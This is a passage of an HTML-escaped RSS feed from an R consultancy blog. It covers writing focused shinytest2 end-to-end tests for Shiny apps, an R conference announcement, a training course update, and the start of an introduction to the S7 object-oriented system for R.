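new = fromJSON(&amp;#39;{&amp;#34;input&amp;#34;: {&amp;#34;greet&amp;#34;: 1, &amp;#34;name&amp;#34;: &amp;#34;Jumping Robots&amp;#34;},
  &amp;#34;output&amp;#34;: {&amp;#34;greeting&amp;#34;: &amp;#34;Hello Jumping Robots!&amp;#34;}, &amp;#34;export&amp;#34;: {}}&amp;#39;)

changed_values(old, new)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the two snapshots above, this reports the &lt;code&gt;input.name&lt;/code&gt; and
&lt;code&gt;output.greeting&lt;/code&gt; entries.&lt;/p&gt;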
&lt;p&gt;As stated above, every &lt;code&gt;input&lt;/code&gt;, &lt;code&gt;output&lt;/code&gt; and &lt;code&gt;export&lt;/code&gt; value that is
stored by Shiny at the point when the snapshot was taken is present in
this .json file. For a large app, this will include many values
that are irrelevant to the behaviour that a given test case is
attempting to check.&lt;/p&gt;
&lt;p&gt;Again, one of the purposes of your tests is to help identify when some
new code breaks existing functionality. What you don’t want is for a
given test to fail when the behaviour it is assessing works fine, but
some disconnected part of the app has changed.&lt;/p&gt;
&lt;p&gt;With {shinytest2}, you can ensure that you only look at the value for
specific variables when making snapshot files. This can help make your
tests more focussed and prevent spurious failures.&lt;/p&gt;
&lt;p&gt;Here, we might rewrite the test to just check the value stored in
&lt;code&gt;output$greeting&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Only check the value of output$greeting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this, the values stored in the .json are more specific to this
test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;output&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Similarly, you probably don’t want a behavioural test to start failing
when the look and feel of the app changes. To prevent {shinytest2} from
using snapshot images you can call
&lt;code&gt;app$expect_values(..., screenshot_args = FALSE)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now that our expected values are more specific to the test case, we can
update the stored snapshot files.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot_review&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e2e-greeter_accepts_username/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you find yourself updating the snapshot files for your tests
often, or if the behaviour under test turns out to be working perfectly
each time you update them, try restricting the set of variables that
your tests check (or preventing the tests from taking screenshots of
your app).&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Here, we created a simple shiny application and showed how to record and
run tests against this app using {shinytest2}. The source code for the
application can be obtained from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-2" rel="external"&gt;github&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The structure of a typical test case is similar to that used with
{testthat} but you must start the app running before interacting with it
or making any test assertions. The {shinytest2} recorder is able to
generate test code to go inside these test cases, and we showed how to
use the recorder with a packaged application. It is important that each
test only makes assertions about the behaviour under scrutiny, so that
it only fails when that behaviour changes.&lt;/p&gt;
&lt;p&gt;The code generated here could be copied and modified to generate further
test cases. Doing this might add lots of duplication across your test
scripts, making your tests harder to maintain. In the next post in this
series, we add a further test to the application and introduce some
design principles that help ensure that your test code supports, rather
than hinders, the further development of your application.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023</title><link>https://www.jumpingrivers.com/blog/satrdays-london/</link><pubDate>Wed, 11 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays is returning to &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;London&lt;/a&gt; this April! SatRdays are low-cost R conferences, hosted on Saturdays to enable those who usually cannot attend to take part.&lt;/p&gt;
&lt;p&gt;Thanks to &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;, SatRdays London will take place at Bush House, King&amp;rsquo;s College London. King’s Bush House buildings provide a home for many of their academic departments, as well as state-of-the-art learning and social spaces and enhanced student facilities. These buildings include lecture theatres, teaching rooms, a 395-seat auditorium, and The Exchange, an open, collaborative space designed for events and exhibitions.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;p&gt;Our keynote speaker is &lt;a href="https://juliasilge.com/" rel="external"&gt;Julia Silge&lt;/a&gt; (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;, formerly RStudio). Julia is a data scientist and software engineer at Posit PBC, working on open-source modelling and MLOps tools. She is an author, an international keynote speaker, and a real-world practitioner focusing on data analysis and machine learning. Julia loves text analysis, making beautiful charts, and communicating technical topics with diverse audiences.&lt;/p&gt;
&lt;p&gt;Abstract submission is now open until the end of 31st January 2023. If you&amp;rsquo;d like the opportunity to share your knowledge, head over to &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;the conference website&lt;/a&gt; to submit! Abstracts should be max. 250 words.&lt;/p&gt;
&lt;p&gt;Early bird registration is also available until 31st January, so get in now before the price rises!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>End-to-end testing with shinytest2: Part 1</title><link>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/</link><pubDate>Thu, 05 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the first of a series of three blog posts about using the
{shinytest2} package to develop automated tests for shiny applications.
In the posts we will cover&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;the purpose of browser-driven end-to-end tests for a shiny
developer, and tools (like {shinytest2}) that help implement them
(this post);&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/" rel="external"&gt;how to write and run a simple test using
{shinytest2}&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/" rel="external"&gt;how best to design your test code so that it supports your future
work&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Automated testing is an essential part of any production-quality
software project. Much of the focus in the R world is on testing the
individual components of a project (the functions, classes etc.), but for
those working with {shiny} applications there are great tools that can
test your application as if a user were interacting with it. In this blog
series, we focus on {shinytest2}, with which we can write tests from a
user’s perspective.&lt;/p&gt;
&lt;p&gt;But … test code is code: In an evolving project, it requires the same
care and maintenance as the rest of your source code. So try to ensure
that your test code is descriptive, and has sensible abstractions that
reduce future maintenance.&lt;/p&gt;
&lt;p&gt;Also … test code defines tests: If your tests pass when they shouldn’t,
or they fail for reasons outside of their remit or in unpredictable
ways, they aren’t doing their job properly. Reducing false positives and
false negatives (suitably defined) may be of as much value to the code
that presents your data analysis results as it is to the machine
learning model that generated them.&lt;/p&gt;
&lt;p&gt;Since these posts cover {shinytest2}, they assume some familiarity with
{shiny} and also with R package development. If you want to know a bit
more about these topics, there are some wonderful online resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the &lt;a href="https://shiny.rstudio.com/articles/" rel="external"&gt;RStudio (now Posit)&lt;/a&gt;
{shiny} articles,&lt;/li&gt;
&lt;li&gt;the &lt;a href="https://mastering-shiny.org/" rel="external"&gt;“Mastering Shiny”&lt;/a&gt; book,&lt;/li&gt;
&lt;li&gt;the &lt;a href="https://r-pkgs.org/" rel="external"&gt;“R Packages”&lt;/a&gt; book.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-end-to-end-testing-shinytest2-part-1"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="ui-based-end-to-end-testing"&gt;UI-based End-To-End Testing&lt;/h2&gt;
&lt;p&gt;{shiny} is a great tool for building interactive data-driven web
applications. Many of the apps built with shiny are quite simple, maybe
only a few hundred lines of code. But some apps are much &lt;em&gt;much bigger&lt;/em&gt;.
As a web application grows in complexity, the developer’s ability to
reason about all the different parts of that application evaporates.
This makes it harder to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;add new features (will the new code break existing functionality?)&lt;/li&gt;
&lt;li&gt;fix bugs (it’s hard to find the broken code in a complicated code
base)&lt;/li&gt;
&lt;li&gt;and onboard new developers.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As your app evolves over time, you should strive to keep the source code
as simple as possible. Good design, documentation and team-communication
can help, but one of the simplest ways to restrain the complexity of
your source code is by investing time to add automated testing.&lt;/p&gt;
&lt;p&gt;There are several levels at which you can test a shiny application. You
might:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;write unit tests to ensure your R (and possibly JavaScript)
functions work as expected;&lt;/li&gt;
&lt;li&gt;write reactivity tests for your back-end logic using
&lt;a href="https://shiny.rstudio.com/reference/shiny/1.5.0/testServer.html" rel="external"&gt;&lt;code&gt;testServer()&lt;/code&gt;&lt;/a&gt;
and the relatively new
&lt;a href="https://shiny.rstudio.com/reference/shiny/1.5.0/moduleServer.html" rel="external"&gt;&lt;code&gt;moduleServer&lt;/code&gt;&lt;/a&gt;
syntax;&lt;/li&gt;
&lt;li&gt;check that the app “works” before checking in your code, by opening
it in the browser and “clicking about a bit …”;&lt;/li&gt;
&lt;li&gt;or you might formalise the latter by writing some manual test
descriptions that define what should happen when the user interacts
with your app in their browser.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Between them, these steps will help prevent you from breaking your app,
identify issues that need to be fixed, and help demonstrate to clients
or colleagues how your app works or that newly requested features / bug
fixes have been implemented. This affords your developers more
confidence when they want to restructure and simplify the source code of
the app. So everyone wins.&lt;/p&gt;
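&lt;p&gt;To make the second of these levels concrete, here is a minimal sketch
of a reactivity test written with &lt;code&gt;testServer()&lt;/code&gt;. The module
&lt;code&gt;greeter_server()&lt;/code&gt; and its &lt;code&gt;username&lt;/code&gt; and &lt;code&gt;greeting&lt;/code&gt; ids are
hypothetical, invented purely for illustration. No browser is involved
here: the server logic is exercised directly in R.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;shiny&amp;#34;)
library(&amp;#34;testthat&amp;#34;)

# Hypothetical module server: builds a greeting from input$username
greeter_server = function(id) {
  moduleServer(id, function(input, output, session) {
    greeting = reactive(paste0(&amp;#34;Hello &amp;#34;, input$username, &amp;#34;!&amp;#34;))
    output$greeting = renderText(greeting())
  })
}

test_that(&amp;#34;the greeting reacts to the username input&amp;#34;, {
  testServer(greeter_server, {
    # Simulate the user typing into the (hypothetical) username input
    session$setInputs(username = &amp;#34;Jumping Rivers&amp;#34;)

    # Check both the reactive and the rendered output
    expect_equal(greeting(), &amp;#34;Hello Jumping Rivers!&amp;#34;)
    expect_equal(output$greeting, &amp;#34;Hello Jumping Rivers!&amp;#34;)
  })
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A test like this runs quickly, but it cannot tell you whether the
UI is wired up correctly in the browser.&lt;/p&gt;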
&lt;p&gt;Manual testing (especially the non-exploratory kind) can get pretty
tedious though. It’s repetitive, it’s repetitive and it’s repetitive.
That’s why you should invest time automating those user-interface-based
(browser-side) end-to-end (app-focussed, not component-focussed) tests.&lt;/p&gt;
&lt;p&gt;There are many tools for writing tests at this level. Typically the
tools have two software components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;a webdriver that interacts with the app in the browser (or a
headless version of a browser) thus mimicking how a user might
interact with the app;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;and a test / assertion library to compare the actual state of the
app to your expectations.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example tools in this space include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.cypress.io/" rel="external"&gt;cypress&lt;/a&gt;, &lt;a href="https://pptr.dev/" rel="external"&gt;puppeteer&lt;/a&gt;
and &lt;a href="https://playwright.dev/" rel="external"&gt;playwright&lt;/a&gt; (in JavaScript)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.selenium.dev/" rel="external"&gt;selenium&lt;/a&gt; (several languages, &lt;a href="https://docs.ropensci.org/RSelenium/" rel="external"&gt;including
R&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;shinytest2&lt;/a&gt; and
&lt;a href="https://rstudio.github.io/shinytest/" rel="external"&gt;shinytest&lt;/a&gt; (in R)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="shinytest2"&gt;{shinytest2}&lt;/h3&gt;
&lt;p&gt;{shinytest2} builds upon the {shinytest} package and was written by
Barret Schloerke and his colleagues at RStudio. Like puppeteer,
{shinytest2} uses the Chrome DevTools Protocol to interact with the
browser, which is a pretty stable basis for building a browser
automation tool (the predecessor {shinytest} was built on a
now-unsupported browser library called
&lt;a href="https://phantomjs.org/" rel="external"&gt;PhantomJS&lt;/a&gt;, so we strongly recommend migrating
to {shinytest2} if you are still using {shinytest}). Test scripts are
written in R and so should be accessible to R developers who are
comfortable with &lt;a href="https://testthat.r-lib.org/" rel="external"&gt;{testthat}&lt;/a&gt;. There is an
automated tool (described in the next post) for creating these test
scripts. Also, {shinytest2} understands the architecture of shiny apps,
so it is simple to access the &lt;code&gt;input&lt;/code&gt; and &lt;code&gt;output&lt;/code&gt; variables that
are stored by a shiny app at any given time, and the &lt;code&gt;input&lt;/code&gt;s can be
modified easily as well. Accessing these variables using the more
general UI-based end-to-end testing tools is much more difficult.&lt;/p&gt;
&lt;p&gt;Last, and by no means least, the documentation for {shinytest2} is
&lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;great&lt;/a&gt; and there are several
videos online that might help you get up to speed.&lt;/p&gt;
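&lt;p&gt;As a rough sketch of what this access to &lt;code&gt;input&lt;/code&gt; and
&lt;code&gt;output&lt;/code&gt; values can look like, the helper below starts an app, sets
an input, clicks a button and reads back an output. The helper
&lt;code&gt;check_greeting()&lt;/code&gt;, its &lt;code&gt;app_dir&lt;/code&gt; argument and the ids
&lt;code&gt;username&lt;/code&gt;, &lt;code&gt;greet&lt;/code&gt; and &lt;code&gt;greeting&lt;/code&gt; are assumptions made for
illustration; they would need to match your own app. Running it also
requires a Chrome-based browser to be available.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: app_dir and all ids below are illustrative
check_greeting = function(app_dir) {
  # Start the app in a headless browser
  app = shinytest2::AppDriver$new(app_dir = app_dir)
  # Make sure the app is shut down when the function exits
  on.exit(app$stop(), add = TRUE)

  # Set an input and click a button, as a user would in the browser
  app$set_inputs(username = &amp;#34;Jumping Rivers&amp;#34;)
  app$click(&amp;#34;greet&amp;#34;)

  # Read a single output value directly from the running app
  app$get_value(output = &amp;#34;greeting&amp;#34;)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;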
&lt;h3 id="a-warning"&gt;A warning&lt;/h3&gt;
&lt;p&gt;Although end-to-end tests written with {shinytest2} (or the other tools,
above) can provide good guarantees about the behaviour of a whole
application, there are some caveats associated with this kind of test.
Compared to component-focussed tests, they tend to be &lt;em&gt;much&lt;/em&gt; slower,
harder to write, more fragile (to changes in the code) and more flaky
(due to external dependencies, the network and so on). So use these
tests sparingly. If you can write a unit test that covers the same
behaviour, this may be a much better use of both your time and your
computer’s.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Here we have introduced browser-driven end-to-end tests as a way to
check that your shiny app behaves as expected. {shinytest2} is a new
tool allowing R developers to write this kind of test in R. These tests
do have some drawbacks - they can be slow and unpredictable. In
subsequent posts we will describe how to write tests using {shinytest2}
and introduce some software design approaches that make these tests a
bit more future-proof.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>December Training Update</title><link>https://www.jumpingrivers.com/blog/december-training-update/</link><pubDate>Tue, 20 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/december-training-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/december-training-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/december-training-update/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re thinking of picking up a new skill in the new year, take a look at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;upcoming public training courses&lt;/a&gt;! We have plenty of introductory courses coming up, both online and in-person, so you can hit the ground running after the holidays!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-december-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h3 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is a &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;one-day intensive course&lt;/a&gt; on Python and assumes no prior knowledge. By the end of the course, participants will be able to import, summarise and plot their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h3 id="introduction-to-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Introduction to Shiny&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have R and data science skills? &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Discover how easy it can be&lt;/a&gt; to use R and {shiny} to create your own apps and dashboards for exploring data without relying on web development or external BI tools. We will show you various examples of input widgets and outputs to display tables and visualisations.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/december-training-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What is S7? A New OOP System for R</title><link>https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/</link><pubDate>Thu, 15 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This blog post aims to give a brief introduction to S7, a new R package for OOP in R. It&amp;rsquo;s not a tutorial on how to write code using S7 - the &lt;a href="https://rconsortium.github.io/OOP-WG/index.html" rel="external"&gt;documentation&lt;/a&gt; provides great instructions for getting started if you&amp;rsquo;re ready to start programming in S7.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Note&lt;/em&gt;&lt;/strong&gt;: This blog post has been updated to reflect the &lt;a href="https://github.com/RConsortium/OOP-WG/issues/262" rel="external"&gt;change in name&lt;/a&gt; from R7 to S7.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="what-is-oop"&gt;What is OOP?&lt;/h3&gt;
&lt;p&gt;Before we talk about S7, we should probably talk about OOP. OOP (short for Object Oriented Programming) is a programming framework that focuses on &lt;em&gt;objects&lt;/em&gt; and their interactions, rather than on the evaluation of functions (as in a functional programming framework). If you&amp;rsquo;re an R user, you&amp;rsquo;ve almost certainly used OOP approaches even if you haven&amp;rsquo;t realised it yet. For example, if you call &lt;code&gt;print()&lt;/code&gt; on a vector the output it returns is very different to the output it returns if you call &lt;code&gt;print()&lt;/code&gt; on a plot.&lt;/p&gt;
&lt;h3 id="oop-in-r"&gt;OOP in R&lt;/h3&gt;
&lt;p&gt;In typical object-oriented systems, each object is of a particular class (type) and has data and methods (object-specific functions) associated with it. The behaviour observed when a method is called depends on the class of the object that the method is associated with. There are multiple OOP systems that already exist in R, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;S3: the simplest and most commonly used object-oriented system, where the &lt;code&gt;class&lt;/code&gt; attribute defines the type of an object. S3 is widely used throughout base R so it’s important to know about it if you want to extend functions to work with different inputs. Its name comes from version 3 of the S language!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;S4: similar to S3 but includes more formal class definitions and validation. In S4, the data contained in an object is defined by the &lt;em&gt;slots&lt;/em&gt; in the class definition. S4 is a bit more complicated than S3 but results in better guarantees. S4 isn&amp;rsquo;t quite as widely used as S3, though the Bioconductor community is a long-term user of S4, so it&amp;rsquo;s important to know if you want to contribute to Bioconductor packages. The {lme4} package and some spatial packages (including {sp}, {rgdal}, and {rgeos}), also make use of S4 classes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Reference Classes (RC): a special type of S4 that also allows objects to be modified in place. Reference classes have seen very little adoption within the R community.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;R6: similar to RC but simpler to use, and built on S3 rather than S4. Unlike the previous OOP systems mentioned, &lt;a href="https://r6.r-lib.org/" rel="external"&gt;R6&lt;/a&gt; is a package rather than part of base R. It&amp;rsquo;s primarily been developed by Posit (formerly RStudio) and is used within the Shiny package.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r7-oop-object-oriented-programming-r"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;This blog post doesn&amp;rsquo;t aim to go into the details about object-oriented systems in R, and I&amp;rsquo;d recommend reading the Object Oriented chapters of &lt;a href="https://adv-r.hadley.nz/oo.html" rel="external"&gt;Advanced R&lt;/a&gt; for more details.&lt;/p&gt;
&lt;p&gt;So if we already have all these OOP systems in R, why do we need another one? You can watch &lt;a href="https://www.youtube.com/watch?v=P3FxCvSueag" rel="external"&gt;Hadley Wickham&amp;rsquo;s talk&lt;/a&gt; from rstudio::conf(2022) for some more background information on the motivation for developing S7.&lt;/p&gt;
&lt;img src="xkcd.png" style="width: 60%; display: block; margin-left: auto; margin-right: auto" alt="XKCD comic 927 showing how standards proliferate" /&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Image: &lt;a href="https://xkcd.com/927"&gt;xkcd.com/927&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 id="what-is-s7"&gt;What is S7?&lt;/h3&gt;
&lt;p&gt;The two main OOP systems in R, S3 and S4, both have their advantages and their limitations. For example, in S3 there&amp;rsquo;s no systematic object validation to make sure an object&amp;rsquo;s class is correct. In S4, the syntax for defining classes is rather unusual and relies on side effects. Issues such as these mean that, unlike other programming languages, there isn&amp;rsquo;t a dominant approach to OOP in R.&lt;/p&gt;
